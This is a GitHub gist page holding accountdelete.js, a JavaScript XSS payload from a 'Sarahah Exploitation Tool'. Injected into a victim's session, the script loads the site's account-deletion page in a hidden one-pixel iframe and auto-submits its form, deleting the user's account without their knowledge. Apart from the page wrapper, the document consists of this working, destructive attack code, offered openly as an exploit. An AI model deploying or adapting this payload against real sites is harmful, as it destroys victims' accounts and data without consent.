Skip to content

Instantly share code, notes, and snippets.

@Cache-Bounty

Cache-Bounty/accountdelete.js

Created August 20, 2017 00:01
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Cache-Bounty/66a169ed48b9280627e4269e7cebb5de to your computer and use it in GitHub Desktop.
Save Cache-Bounty/66a169ed48b9280627e4269e7cebb5de to your computer and use it in GitHub Desktop.
Download ZIP
Sarahah Exploitation Tool - Exploit Codes
Raw
accountdelete.js
/*
____ _ _
/ ___| __ _ _ __ __ _| |__ __ _| |__
\___ \ / _` | '__/ _` | '_ \ / _` | '_ \
___) | (_| | | | (_| | | | | (_| | | | |
|____/ \__,_|_| \__,_|_| |_|\__,_|_| |_|
Sarahah XSS Exploitation Script
Author:Shawar Khan ( www.shawarkhan.com )
*/
// Account Delete Exploit Code
// Params Required: None
document.getElementsByClassName('col-xs-3')[0].innerHTML="<iframe id='myframe' src='https://"+document.domain+"/Manage/Delete' onload='d4rk()' width='1px' height='1px' style='opacity:0'></iframe>";
function d4rk(){;
var MyIFrame = document.getElementById("myframe");
var MyIFrameDoc = (MyIFrame.contentWindow || MyIFrame.contentDocument);
MyIFrameDoc = MyIFrameDoc.document;
MyIFrameDoc.forms[1].submit();
MyIFrame.onload=null;}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment